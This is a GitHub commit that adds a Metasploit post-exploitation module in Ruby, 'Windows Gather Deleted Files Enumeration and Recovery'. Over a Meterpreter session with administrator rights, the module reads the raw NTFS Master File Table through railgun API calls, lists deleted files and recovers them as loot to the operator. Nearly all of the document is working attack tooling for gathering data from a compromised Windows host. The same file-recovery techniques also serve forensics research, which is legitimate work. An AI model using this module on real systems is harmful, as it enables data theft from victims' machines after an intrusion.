Commit 567d2bb

jvazquez-r7 committed
Land rapid7#1687, @bmerinofe's forensic file recovery post module
2 parents 3a7dbd7 + d360d36

1 file changed: 399 additions (+), 0 deletions (-)

@@ -0,0 +1,399 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Post

  include Msf::Post::Windows::Priv

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Gather Deleted Files Enumeration and Recovery',
      'Description'   => %q{
        This module lists and attempts to recover deleted files from NTFS file systems. Use
        the FILES option to guide recovery: leave it empty to enumerate deleted files on the
        DRIVE, set it to an extension (e.g. "pdf") to recover deleted files with that
        extension, or set it to a comma-separated list of IDs (taken from the enumeration)
        to recover those specific files. Keep in mind that file enumeration and recovery
        can take a long time; use the TIMEOUT option to abort enumeration or recovery by
        extension after that many seconds.
      },
      'License'       => MSF_LICENSE,
      'Platform'      => ['win'],
      'SessionTypes'  => ['meterpreter'],
      'Author'        => ['Borja Merino <bmerinofe[at]gmail.com>'],
      'References'    => [
        [ 'URL', 'http://www.youtube.com/watch?v=9yzCf360ujY&hd=1' ]
      ]
    ))

    register_options(
      [
        OptString.new('FILES', [false, 'ID or extensions of the files to recover, comma separated. Leave empty to enumerate deleted files.', ""]),
        OptString.new('DRIVE', [true, 'Drive you want to recover files from.', "C:"]),
        OptInt.new('TIMEOUT', [true, 'Search timeout. If 0 the module will go through the entire $MFT.', 3600])
      ], self.class)
  end
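
  # Typical workflow (hypothetical example values): leave FILES empty on a first run to
  # enumerate deleted entries, note the IDs printed for interesting files, then run the
  # module again with e.g. FILES=pdf,docx (recover by extension) or
  # FILES=43644928,44068864 (recover by the MFT-entry IDs printed during enumeration).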

  def run
    winver = sysinfo["OS"]

    if winver =~ /2000/i
      print_error("Module not valid for Windows 2000")
      return
    end

    drive = datastore['DRIVE']
    fs = file_system(drive)

    if fs !~ /ntfs/i
      print_error("The file system is not NTFS")
      return
    end

    if not is_admin?
      print_error("You don't have enough privileges. Try getsystem.")
      return
    end

    print_status("System Info - OS: #{winver}, Drive: #{drive}")
    type = datastore['FILES']
    files = type.split(',')
    # To extract files from their IDs
    if datastore['FILES'] != "" and is_numeric(files[0])
      r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
      if r['GetLastError'] == 0
        recover_file(files, r['return'])
        client.railgun.kernel32.CloseHandle(r['return'])
      else
        print_error("Error opening #{drive} GetLastError=#{r['GetLastError']}")
      end
    # To show deleted files (FILES="") or extract the type of file specified by extension
    else
      handle = get_mft_info(drive)
      if handle != nil
        data_runs = mft_data_runs(handle)
        vprint_status("It seems that the MFT is fragmented (#{data_runs.size - 1} data runs)") if (data_runs.count > 2)
        to = (datastore['TIMEOUT'].zero?) ? nil : datastore['TIMEOUT']
        begin
          ::Timeout.timeout(to) do
            deleted_files(data_runs[1..-1], handle, files)
          end
        rescue ::Timeout::Error
          print_error("Timed out after #{to} seconds. Skipping...")
        end
      end
    end
  end

  def get_high_low_values(offset)
    # Always positive values
    return [offset, 0] if (offset < 0x1_0000_0000)
    # Unusual case: the MFT data run would have to be really far into the disk
    return [offset & 0xffff_ffff, offset >> 32]
  end
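
  # get_high_low_values example: an absolute byte offset of 0x1_2345_6789 is split into
  # low = 0x2345_6789 and high = 0x1, the two 32-bit halves that SetFilePointer expects
  # (lDistanceToMove / lpDistanceToMoveHigh).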

  # Recover the content of the requested file(s)
  def recover_file(offset, handle)
    ra = file_system_features(handle)
    # Offset could be a comma-separated list of IDs
    0.upto(offset.size - 1) { |i|
      val = get_high_low_values(offset[i].to_i)
      client.railgun.kernel32.SetFilePointer(handle, val[0], val[1], 0)
      rf = client.railgun.kernel32.ReadFile(handle, 1024, 1024, 4, nil)
      attributes = rf['lpBuffer'][56..-1]
      name = get_name(attributes)
      print_status("File to download: #{name}")
      vprint_status("Getting Data Runs ...")
      data = get_data_runs(attributes)
      if data == nil or name == nil
        print_error("There were problems recovering the file: #{name}")
        next
      end

      # If the file is resident
      if data[0] == 0
        print_status("The file is resident. Saving #{name} ... ")
        path = store_loot("resident.file", "application/octet-stream", session, data[1], name.downcase, nil)
        print_good("File saved on #{path}")

      # If the file is not resident
      else
        # Due to the size of non-resident files we have to store small chunks of data as we go through
        # each of the data runs that make up the file (save_file function).
        size = get_size(rf['lpBuffer'][56..-1])
        print_status("The file is not resident. Saving #{name} ... (#{size} bytes)")
        base = 0
        # Go through each of the data runs to save the file
        file_data = ""
        1.upto(data.count - 1) { |i|
          datarun = get_datarun_location(data[i])
          base = base + datarun[0]
          size = save_file([base, datarun[1]], size, file_data, handle)
        }
        path = store_loot("nonresident.file", "application/octet-stream", session, file_data, name.downcase, nil)
        print_good("File saved on #{path}")
      end
    }
  end

  # Save the non-resident file to disk
  def save_file(datarun, size, file_data, handle)
    ra = file_system_features(handle)
    bytes_per_cluster = ra['lpOutBuffer'][44,4].unpack("V*")[0]
    distance = get_high_low_values(datarun[0] * bytes_per_cluster)
    client.railgun.kernel32.SetFilePointer(handle, distance[0], distance[1], 0)
    # Buffer chunks to store on disk. Modify this value as you wish.
    buffer_size = 8
    division = datarun[1] / buffer_size
    rest = datarun[1] % buffer_size
    vprint_status("Number of chunks: #{division} Rest: #{rest} clusters Chunk size: #{buffer_size} clusters")
    if (division > 0)
      1.upto(division) { |i|
        if (size > bytes_per_cluster * buffer_size)
          rf = client.railgun.kernel32.ReadFile(handle, bytes_per_cluster * buffer_size, bytes_per_cluster * buffer_size, 4, nil)
          file_data << rf['lpBuffer']
          size = size - bytes_per_cluster * buffer_size
          vprint_status("Saved 1 chunk of #{buffer_size * bytes_per_cluster} bytes, #{size} bytes left")
        # It's the last chunk of the file
        else
          rf = client.railgun.kernel32.ReadFile(handle, bytes_per_cluster * buffer_size, bytes_per_cluster * buffer_size, 4, nil)
          file_data << rf['lpBuffer'][0..size - 1]
          vprint_status("Saved 1 chunk of #{size} bytes")
        end
      }
    end

    if (rest > 0)
      # It's the last data run
      if (size < rest * bytes_per_cluster)
        rf = client.railgun.kernel32.ReadFile(handle, rest * bytes_per_cluster, rest * bytes_per_cluster, 4, nil)
        # Don't save the slack space
        file_data << rf['lpBuffer'][0..size - 1]
        vprint_status("(Last data run) Saved 1 chunk of #{size} bytes")
      else
        rf = client.railgun.kernel32.ReadFile(handle, bytes_per_cluster * rest, bytes_per_cluster * rest, 4, nil)
        file_data << rf['lpBuffer']
        size = size - bytes_per_cluster * rest
        vprint_status("(Not the last data run) Saved 1 chunk of #{rest * bytes_per_cluster} bytes, #{size} bytes left")
      end
    end
    return size
  end
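
  # save_file arithmetic example (hypothetical values): with 4096-byte clusters and a data
  # run of 20 clusters, the run is read as division = 20 / 8 = 2 chunks of 32768 bytes plus
  # rest = 4 clusters (16384 bytes); only the remaining "size" bytes of the final read are
  # kept, so slack space past the logical end of the file is discarded.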

  # Get the starting cluster (relative to the previous run) and the length in clusters of a data run
  def get_datarun_location(datarun)

    n_log_cluster = datarun.each_byte.first.divmod(16)[0]
    n_offset = datarun.each_byte.first.divmod(16)[1]

    log_cluster = datarun[-(n_log_cluster)..-1]
    offset = datarun[1..n_offset]

    log_cluster << "\x00" if (log_cluster.size % 2 != 0)
    offset << "\x00" if (offset.size % 2 != 0)
    # The logical cluster value could be negative, so we need the two's complement in those cases
    if log_cluster.size == 2
      int_log_cluster = log_cluster.unpack('s*')[0]
    elsif log_cluster.size == 4
      int_log_cluster = log_cluster.unpack('l')[0]
    end

    if offset.size == 2
      int_offset = offset.unpack('v*')[0]
    else
      int_offset = offset.unpack('V')[0]
    end
    return int_log_cluster, int_offset
  end
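
  # NTFS data run encoding (assuming the standard layout): the first byte is a header whose
  # low nibble is the size in bytes of the run-length field and whose high nibble is the size
  # of the starting-cluster field; the length bytes come first, then the cluster bytes, both
  # little-endian, with the cluster value signed and relative to the previous run.
  # Hypothetical example: "\x21\x18\x34\x56" decodes to a run of 0x18 clusters starting
  # 0x5634 clusters after the previous run.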

  # Go through the data run and save the wanted files
  def go_over_mft(logc, offset, handle, files)
    dist = get_high_low_values(logc)
    client.railgun.kernel32.SetFilePointer(handle, dist[0], dist[1], 0)
    1.upto(offset) { |i|
      # If it has a FILE header and it is a deleted file (flags == \x00\x00)
      rf = client.railgun.kernel32.ReadFile(handle, 1024, 1024, 4, nil)
      if (rf['lpBuffer'][0,4] == "\x46\x49\x4c\x45") and (rf['lpBuffer'][22,2] == "\x00\x00")
        name = get_name(rf['lpBuffer'][56..-1])
        if name != nil
          print_status("Name: #{name} ID: #{logc}")
          # If we want to save it according to its file extension
          if files != "" and files.include? File.extname(name.capitalize)[1..-1]
            print_good("Hidden file found!")
            recover_file([logc.to_s], handle)
            dist = get_high_low_values(logc + 1024)
            # We need to restore the pointer to the next MFT entry
            client.railgun.kernel32.SetFilePointer(handle, dist[0], dist[1], 0)
          end
        end
      # MFT entry with no FILE ('\x46\x49\x4c\x45') header, or not a deleted file (dir, in-use file, deleted dir)
      else
        logc = logc + 1024
        next
      end
      logc = logc + 1024
    }
  end

  # Receive the MFT data runs and list/save the deleted files
  # Useful cheat sheet to understand the MFT structure: http://www.writeblocked.org/resources/ntfs_cheat_sheets.pdf
  # Recap of each of the attributes: http://runenordvik.com/doc/MFT-table.pdf
  def deleted_files(data_runs, handle, files)
    ra = file_system_features(handle)
    bytes_per_cluster = ra['lpOutBuffer'][44,4].unpack("V*")[0]
    print_status("$MFT is made up of #{data_runs.size} data runs")
    base = 0
    real_loc = []
    0.upto(data_runs.size - 1) { |i|
      datar_info = get_datarun_location(data_runs[i])
      base = base + datar_info[0]
      vprint_status("MFT data run #{i+1} is at byte #{base * bytes_per_cluster}. It has a total of #{datar_info[1]} clusters")
      # Add to the beginning
      real_loc.unshift([base * bytes_per_cluster, (bytes_per_cluster * datar_info[1]) / 1024])
    }

    # We start with the last data run so that recently deleted files show up sooner
    0.upto(real_loc.size - 1) { |i|
      print_status("Searching deleted files in data run #{data_runs.size - i} ... ")
      go_over_mft(real_loc[i][0], real_loc[i][1], handle, files)
    }

    print_good("MFT entries finished")
    client.railgun.kernel32.CloseHandle(handle)
  end

  def get_name(entry)
    data_name = get_attribute(entry, "\x30\x00\x00\x00")
    return nil if data_name == nil
    length = data_name[88,1].unpack('H*')[0].to_i(16)
    return data_name[90, length * 2].delete("\000")
  end
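
  # get_name offsets assume a resident $FILE_NAME attribute with a 0x18-byte attribute
  # header: the name length (in characters) sits at 0x18 + 0x40 = 88 and the UTF-16LE name
  # itself starts at 0x18 + 0x42 = 90; stripping the NUL bytes leaves an ASCII approximation
  # of the name.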

  def get_size(entry)
    data = get_attribute(entry, "\x80\x00\x00\x00")
    return if data == nil
    return data[48,8].unpack('Q*')[0]
  end

  # Get the NTFS information and return a handle positioned at the beginning of the MFT
  def get_mft_info(drive)
    r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)

    if r['GetLastError'] != 0
      print_error("Error opening #{drive} GetLastError=#{r['GetLastError']}")
      print_error("Try to get SYSTEM privileges") if r['GetLastError'] == 5
      return nil
    else
      ra = file_system_features(r['return'])
      bytes_per_cluster = ra['lpOutBuffer'][44,4].unpack("V*")[0]
      mft_logical_offset = ra['lpOutBuffer'][64,8].unpack("V*")[0]
      offset_mft_bytes = mft_logical_offset * bytes_per_cluster
      vprint_status("Logical cluster: #{ra['lpOutBuffer'][64,8].unpack('h*')[0].reverse}")
      vprint_status("NTFS Volume Serial Number: #{ra['lpOutBuffer'][0,8].unpack('h*')[0].reverse}")
      vprint_status("Bytes per Sector: #{ra['lpOutBuffer'][40,4].unpack('V*')[0]}")
      vprint_status("Bytes per Cluster: #{bytes_per_cluster}")
      vprint_status("Length of the MFT (bytes): #{ra['lpOutBuffer'][56,8].unpack('Q*')[0]}")
      vprint_status("Logical cluster where the MFT starts: #{mft_logical_offset}")
      # We set the pointer to the beginning of the MFT
      client.railgun.kernel32.SetFilePointer(r['return'], offset_mft_bytes, 0, 0)
      return r['return']
    end
  end

  def file_system_features(handle)
    fsctl_get_ntfs_volume_data = 0x00090064
    return client.railgun.kernel32.DeviceIoControl(handle, fsctl_get_ntfs_volume_data, "", 0, 200, 200, 4, nil)
  end
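
  # The lpOutBuffer offsets used throughout the module come from the NTFS_VOLUME_DATA_BUFFER
  # structure returned by FSCTL_GET_NTFS_VOLUME_DATA: 0 = VolumeSerialNumber,
  # 40 = BytesPerSector, 44 = BytesPerCluster, 56 = MftValidDataLength, 64 = MftStartLcn.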

  def mft_data_runs(handle)
    # Read the first entry of the MFT (the $MFT itself)
    rf = client.railgun.kernel32.ReadFile(handle, 1024, 1024, 4, nil)
    # Return the list of data runs of the MFT
    return get_data_runs(rf['lpBuffer'][56..-1])
  end

  # Receives a string pointing to the first attribute of a file entry and returns an array of data runs
  # for that file. The first element will be 1 or 0 depending on whether the attribute is non-resident
  # or resident. If it's resident, the second element will be the content itself; otherwise
  # (non-resident) each remaining element will contain one of the data runs of the file.
  def get_data_runs(data)
    # We reach the $DATA attribute
    data_runs = get_attribute(data, "\x80\x00\x00\x00")
    return nil if data_runs == nil
    print_status("File compressed/encrypted/sparse. Ignore this file if you get errors") if ["\x01\x00", "\x00\x40", "\x00\x80"].include? data_runs[12,2]
    # Check if the file is resident or not
    resident = data_runs[8,1]
    if resident == "\x00"
      inf = [0]
      inf << get_resident(data_runs)
      return inf
    else
      inf = [1]
      # Get the offset of the first data run from $DATA
      dist_datar = data_runs[32,2].unpack('v*')[0]
      data_run = data_runs[dist_datar..-1]
      # Get an array of data runs. If this array contains more than 1 element the file is fragmented.
      length_dr = data_run.each_byte.first.divmod(16)
      while (length_dr[0] != 0 && length_dr[1] != 0)
        chunk = data_run[0, length_dr[0] + length_dr[1] + 1]
        inf << chunk
        data_run = data_run[length_dr[0] + length_dr[1] + 1..-1]
        begin
          length_dr = data_run.each_byte.first.divmod(16)
        rescue
          return nil
        end
      end
      return inf
    end
  end
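
  # Hypothetical get_data_runs return values: a small resident file yields [0, "<raw content>"],
  # while a fragmented non-resident file yields something like [1, "\x21\x18\x34\x56", "\x11\x10\x20"],
  # one encoded data run per element.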

  # Get the content of the file when it's resident
  def get_resident(data)
    start = data[20,2].unpack('v*')[0]
    offset = data[16,4].unpack('V*')[0]
    return data[start, offset]
  end

  # Find the requested attribute in the file entry and return a string with all the information of that attribute
  def get_attribute(str, code)
    0.upto(15) do |i|
      header = str[0,4]
      size_att = str[4,4].unpack('V*')[0]
      if header == code
        return str[0..size_att]
      else
        # Skip invalid entries or stop when the attribute doesn't exist
        return nil if (size_att > 1024) or header == "\xff\xff\xff\xff"
        str = str[size_att..-1]
      end
    end
    print_status("Attribute not found")
    return nil
  end
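
  # Attribute type codes used by this module (packed as little-endian DWORDs):
  # 0x30 = $FILE_NAME, 0x80 = $DATA; 0xFFFFFFFF marks the end of the attribute list
  # in an MFT entry.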

  # Get the type of file system
  def file_system(drive)
    # BOOL WINAPI GetVolumeInformation(
    #   _In_opt_  LPCTSTR lpRootPathName,
    #   _Out_opt_ LPTSTR  lpVolumeNameBuffer,
    #   _In_      DWORD   nVolumeNameSize,
    #   _Out_opt_ LPDWORD lpVolumeSerialNumber,
    #   _Out_opt_ LPDWORD lpMaximumComponentLength,
    #   _Out_opt_ LPDWORD lpFileSystemFlags,
    #   _Out_opt_ LPTSTR  lpFileSystemNameBuffer,
    #   _In_      DWORD   nFileSystemNameSize)
    r = client.railgun.kernel32.GetVolumeInformationA("#{drive}//", nil, nil, nil, nil, nil, 8, 8)
    fs = r['lpFileSystemNameBuffer']
    return fs
  end

  def is_numeric(o)
    true if Integer(o) rescue false
  end
end
